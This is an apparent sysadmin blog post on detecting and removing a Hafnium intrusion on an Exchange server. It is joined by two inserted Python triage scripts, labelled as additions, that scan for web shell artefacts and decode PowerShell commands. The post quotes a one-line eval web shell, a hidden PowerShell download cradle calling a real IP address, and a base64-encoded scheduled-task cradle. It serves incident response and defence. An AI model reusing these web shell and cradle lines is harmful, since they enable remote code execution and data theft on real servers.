how to detect and remove hafnium intrusion
blog.comfine.de, published 2021-03-09, last modified 2021-03-17
https://blog.comfine.de/how-to-detect-and-remove-hafnium-intrusion/

detecting intrusions:
i began with the powershell script microsoft offered to check whether the system could be attacked, but its result did not lead me to the suspicious files.

so i checked different folders by hand and looked for new aspx files, as the document of the BSI in germany told me to do. i found aspx files located in c:\inetpub\wwwroot\aspnet_client\:

0QWYSEXe.aspx, load.aspx and logaaa.aspx.


as the screenshot showed, there were multiple attacks, starting from 05.03.2021.

inside the aspx file are external urls like this one:

ExternalUrl : http://f/<script language="JScrpit" runat="server">funciton Page_Load(){eval(Request["Load"],"unsafe");}</script>

as i had read about zip files and dumps being uploaded in other cases, i used my favorite file manager total commander to search for all files changed more than a day ago (because i had installed os updates that day), but not longer than 8 days ago.


i noticed some files in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 that had the same name as the aspx files but ended with .compiled

in the same directory were two dll files with a suspicious name (App_web_lzeymprh.dll for example) and date.
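The manual hunt described above (new aspx files under aspnet_client, files changed inside a date window, and the matching .compiled artefacts and App_Web_*.dll assemblies in the Framework64\v4.0.30319 tree) can be done in one pass over the drive. The following Python is an added example and is not part of the original post or of any tool it mentions. It walks a root directory, flags files by location and name, marks whether their modification time falls in the same "older than 1 day, newer than 8 days" window the post used, and links each .compiled file back to the aspx file whose name it carries. Run it with the root set to the Exchange system drive, or against a mounted copy of it. The sample tree it builds in a temporary directory is constructed here; the hash part of load.aspx.cdcab7d2.compiled and the Temporary ASP.NET Files subfolder are assumptions about where such artefacts sit, not paths quoted from the post.

```python
import os
import shutil
import tempfile
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Indicator locations taken from the post; path components are compared case-insensitively.
WEBSHELL_DIR = "aspnet_client"      # directory where the .aspx web shells were dropped
DOTNET_VERSION_DIR = "v4.0.30319"   # Framework64\v4.0.30319 tree holding the compile artefacts


def classify(path):
    """Return the list of reasons a file is interesting, or [] if it matches no indicator.
    PureWindowsPath splits on both / and \\, so host paths parse the same on any analyst OS."""
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    name = parts[-1]
    reasons = []
    if name.endswith(".aspx") and WEBSHELL_DIR in parts:
        reasons.append("aspx file under aspnet_client")
    if DOTNET_VERSION_DIR in parts:
        if name.endswith(".compiled"):
            reasons.append("ASP.NET .compiled artefact")
        if name.startswith("app_web_") and name.endswith(".dll"):
            reasons.append("App_Web_*.dll compiled page assembly")
    return reasons


def find_suspicious_files(root, now=None, min_age_days=1, max_age_days=8):
    """Walk root and return hits sorted by path. Each hit carries its reasons, its modification
    time and whether that time lies inside [min_age_days, max_age_days] before now."""
    now = now or datetime.now()
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            reasons = classify(full)
            if not reasons:
                continue
            mtime = datetime.fromtimestamp(os.path.getmtime(full))
            age_days = (now - mtime).total_seconds() / 86400
            hits.append({"path": full, "name": fname, "reasons": reasons, "modified": mtime,
                         "in_window": min_age_days <= age_days <= max_age_days})
    # A .compiled file named after a found shell (load.aspx.<hash>.compiled for load.aspx)
    # is the ASP.NET compiler's trace of that shell having been requested and served.
    shell_names = {h["name"].lower() for h in hits if h["name"].lower().endswith(".aspx")}
    for h in hits:
        low = h["name"].lower()
        if low.endswith(".compiled"):
            for shell in shell_names:
                if low.startswith(shell + "."):
                    h["reasons"].append(f"compiled from {shell}")
    return sorted(hits, key=lambda h: h["path"])


def build_sample_tree(base, now):
    """Constructed sample layout mirroring the post's findings (not files from the incident)."""
    def put(rel, age_days):
        full = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write("sample")
        ts = (now - timedelta(days=age_days)).timestamp()
        os.utime(full, (ts, ts))
    put("inetpub/wwwroot/aspnet_client/load.aspx", 3)
    put("inetpub/wwwroot/aspnet_client/logaaa.aspx", 3)
    put("inetpub/wwwroot/aspnet_client/system_web/legacy.aspx", 200)  # old: outside the window
    put("inetpub/wwwroot/aspnet_client/system_web/style.css", 3)      # recent but no indicator
    tmp = "Windows/Microsoft.NET/Framework64/v4.0.30319/Temporary ASP.NET Files/root/1a2b/3c4d/"
    put(tmp + "load.aspx.cdcab7d2.compiled", 3)   # hash part is made up for the sample
    put(tmp + "App_Web_lzeymprh.dll", 3)
    put("Windows/Microsoft.NET/Framework64/v4.0.30319/System.Web.dll", 400)  # normal framework dll


def demo():
    """Build the sample tree in a temp dir, scan it, clean up, and return the hits."""
    now = datetime.now()
    base = tempfile.mkdtemp()
    try:
        build_sample_tree(base, now)
        return find_suspicious_files(base, now=now)
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for hit in demo():
        flag = "IN WINDOW" if hit["in_window"] else "         "
        print(flag, hit["path"], "|", "; ".join(hit["reasons"]))
```

On a real drive the aspnet_client and v4.0.30319 filters keep the result list short; the time window is reported per hit rather than used to drop hits, because a shell dropped before the window (like the old legacy.aspx in the sample) is still worth a look.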


"removal" of the intrusion:
i moved the dll files, the .compiled files and of course the aspx files to another directory.

an easier and automatic way that checks your whole system is the free thor lite scanner, which i can highly recommend!

you need to give information like name and email address to obtain a license file for the scanner, but it scans your whole system:
in my case it found all the aspx files, but not the dll files.

i checked the task manager for suspicious processes and indeed found one: a powershell sub-process of cmd.exe:

powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://188.166.162.201/update.png?v&mac=00-50-56-00-C1-2F&av=&version=6.3.9600&bit=64-Bit&flag2=True&domain=customers.comfine.de&user=EXCHANGE$&PS=True')"

i checked it with process explorer: the process had been running since 8.3.2021 at 2:57:09 and had done more than 73,000,000 bytes of I/O reads.

this ip address is located in the USA.

i installed all patches for the exchange server, including the latest one from march.

after a reboot the powershell process was there again!

on my system i found a scheduled task that starts this powershell command:

powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYwBkAG4ALgBjAGgAYQB0AGMAZABuAC4AbgBlAHQALwBwAD8AaABpAGcAMgAxADAAMwAwADUAJwApAA==


i deleted the scheduled task and killed the process.

i also scanned the drive for files containing the ip address with my favorite file manager total commander.


so if you are not sure whether some files have been transferred, maybe you can check the log file system32\winevt\logs\Windows PowerShell.evtx

by the way, the thor lite scanner also registered the powershell execution, as my search found in the txt log file in my download folder, but unfortunately it was not mentioned in the easily human-readable html log.

the txt file logged the following:

Mar 9 10:29:29 Exchange/148.xxx.xxx.xxx THOR: Info: MODULE: ProcessCheck MESSAGE: Process info SCANID: S-8DAnIqx3lyo PID: 11888 PPID: 12284 PARENT: NAME: cmd.exe OWNER: NT-AUTORITÄT\SYSTEM COMMAND: "C:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://188.166.162.201/update.png?v&mac=00-50-56-00-C1-2F&av=&version=6.3.9600&bit=64-Bit&flag2=True&domain=customers.comfine.de&user=EXCHANGE$&PS=True')" PATH: C:\windows\system32\cmd.exe CREATED: Mon Mar 8 02:57:08 2021 MD5: 622d21c40a25f9834a03bfd5ff4710c1 CONNECTION_COUNT: 0 LISTEN_PORTS: FILE_1: C:\windows\system32\cmd.exe EXISTS_1: yes CREATED_1: Wed Jun 3 10:16:43 2015 MD5_1: 622d21c40a25f9834a03bfd5ff4710c1 SHA1_1: 98a9ac93fe31f38f47f38db78bf12fa0c6214f9a SHA256_1: 48985b22a895154cc44f9eb77489cfdf54fa54506e8ecaef492fe30f40d27e90 FIRSTBYTES_1: 4d5a90000300000004000000ffff0000b8000000
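The three command lines on this page (the powershell sub-process of cmd.exe, the scheduled task's -e payload, and the THOR ProcessCheck line above) all describe the same kind of download cradle, and the same triage applies to each. The following Python is an added example, not part of the original post and not code from THOR: it splits a THOR "KEY: value" text log line into fields, flags the usual hiding switches in a powershell command line, decodes a -e/-EncodedCommand payload (base64 over UTF-16LE) so that the hidden cradle can be read, and pulls the contacted URLs out of both. The sample log line and task command are reconstructed from this page with straight quotes (the typographic quotes on the page are WordPress formatting); the key names and the way an empty value is written ("PARENT: NAME: cmd.exe") are inferred from that one line, so the parser is an assumption about the log format rather than THOR's documented grammar.

```python
import base64
import re

# THOR text log lines read "KEY: value KEY: value ..." with upper-case keys; an empty value
# ("PARENT: NAME: cmd.exe") is allowed. Inferred from the single line on the page.
KEY_RE = re.compile(r"(?<=\s)([A-Z][A-Z0-9_]*):(?:\s|$)")

# Switches and cradle pieces worth flagging in any powershell command line (case-insensitive).
INDICATORS = [
    (re.compile(r"(?<!\S)-nop(?:rofile)?\b", re.I), "NoProfile"),
    (re.compile(r"(?<!\S)-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"(?<!\S)-e(?:xecutionpolicy|p)\s+bypass\b", re.I), "ExecutionPolicy Bypass"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "Invoke-Expression"),
    (re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I), "download cradle"),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (assumed common spellings).
ENCODED_RE = re.compile(r"(?<!\S)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)


def parse_thor_line(line):
    """Return {KEY: value}; the timestamp/host text before the first key goes under 'header'."""
    matches = list(KEY_RE.finditer(line))
    fields = {"header": line[: matches[0].start()].strip() if matches else line.strip()}
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(line)
        fields[m.group(1)] = line[m.end():end].strip()
    return fields


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text); None if absent or invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command_line(cmdline):
    """Flag hiding switches and download cradles, looking inside an encoded payload as well."""
    indicators = [label for rx, label in INDICATORS if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        indicators.append("encoded command")
        indicators += [label for rx, label in INDICATORS
                       if label not in indicators and rx.search(decoded)]
    urls = URL_RE.findall(cmdline) + (URL_RE.findall(decoded) if decoded else [])
    return {"indicators": indicators, "decoded": decoded, "urls": urls,
            "suspicious": len(indicators) >= 2}


# Constructed from the page's THOR ProcessCheck line, with straight quotes.
THOR_LINE = (
    r"Mar 9 10:29:29 Exchange/148.xxx.xxx.xxx THOR: Info: MODULE: ProcessCheck MESSAGE: Process info "
    r"SCANID: S-8DAnIqx3lyo PID: 11888 PPID: 12284 PARENT: NAME: cmd.exe OWNER: NT-AUTORITÄT\SYSTEM "
    r'COMMAND: "C:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -c "IEX (New-Object '
    r"Net.WebClient).downloadstring('http://188.166.162.201/update.png?v&mac=00-50-56-00-C1-2F&av=&version="
    r"""6.3.9600&bit=64-Bit&flag2=True&domain=customers.comfine.de&user=EXCHANGE$&PS=True')" """
    r"PATH: C:\windows\system32\cmd.exe CREATED: Mon Mar 8 02:57:08 2021 MD5: 622d21c40a25f9834a03bfd5ff4710c1 "
    r"CONNECTION_COUNT: 0 LISTEN_PORTS: FILE_1: C:\windows\system32\cmd.exe EXISTS_1: yes "
    r"CREATED_1: Wed Jun 3 10:16:43 2015 MD5_1: 622d21c40a25f9834a03bfd5ff4710c1 "
    r"SHA1_1: 98a9ac93fe31f38f47f38db78bf12fa0c6214f9a "
    r"SHA256_1: 48985b22a895154cc44f9eb77489cfdf54fa54506e8ecaef492fe30f40d27e90 "
    r"FIRSTBYTES_1: 4d5a90000300000004000000ffff0000b8000000"
)
# The scheduled task's command line as quoted on the page.
TASK_COMMAND = (
    "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYwBkAG4ALgBjAGgAYQB0AGMAZABuAC4AbgBlAHQA"
    "LwBwAD8AaABpAGcAMgAxADAAMwAwADUAJwApAA=="
)


def demo():
    """Parse the sample THOR line and triage both command lines."""
    fields = parse_thor_line(THOR_LINE)
    process = triage_command_line(fields["COMMAND"])
    task = triage_command_line(TASK_COMMAND)
    return fields, process, task


if __name__ == "__main__":
    fields, process, task = demo()
    print("process", fields["PID"], fields["NAME"], "owner", fields["OWNER"], "created", fields["CREATED"])
    print("  indicators:", ", ".join(process["indicators"]), "| urls:", process["urls"])
    print("task indicators:", ", ".join(task["indicators"]))
    print("  decoded:", task["decoded"], "| urls:", task["urls"])
```

Decoding the scheduled task's payload shows it is the same IEX/downloadstring cradle as the process found in the task manager, only with a different download host, which is why the process came back after each reboot until the task was removed. The query string of the first URL also shows what the cradle reports home (MAC address, OS version, domain and user), useful when deciding what to treat as exposed.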

this article is no guarantee that there is nothing left on the system! i will now do further analysis and will update this article if there is some useful information.

the next step will be to try the safety scanner that microsoft published in january this year and updated recently.
small update: the ms scanner found NOTHING, no surprise, i didn't expect microsoft to provide a useful tool anyway.....
one more update: it seems the scanner was not executed correctly the first time; on the next run it found some infections and removed them... so the scanner seems to be worth a try

good luck with your exchange systems! and don't forget to leave a comment and a thank you! 🙂
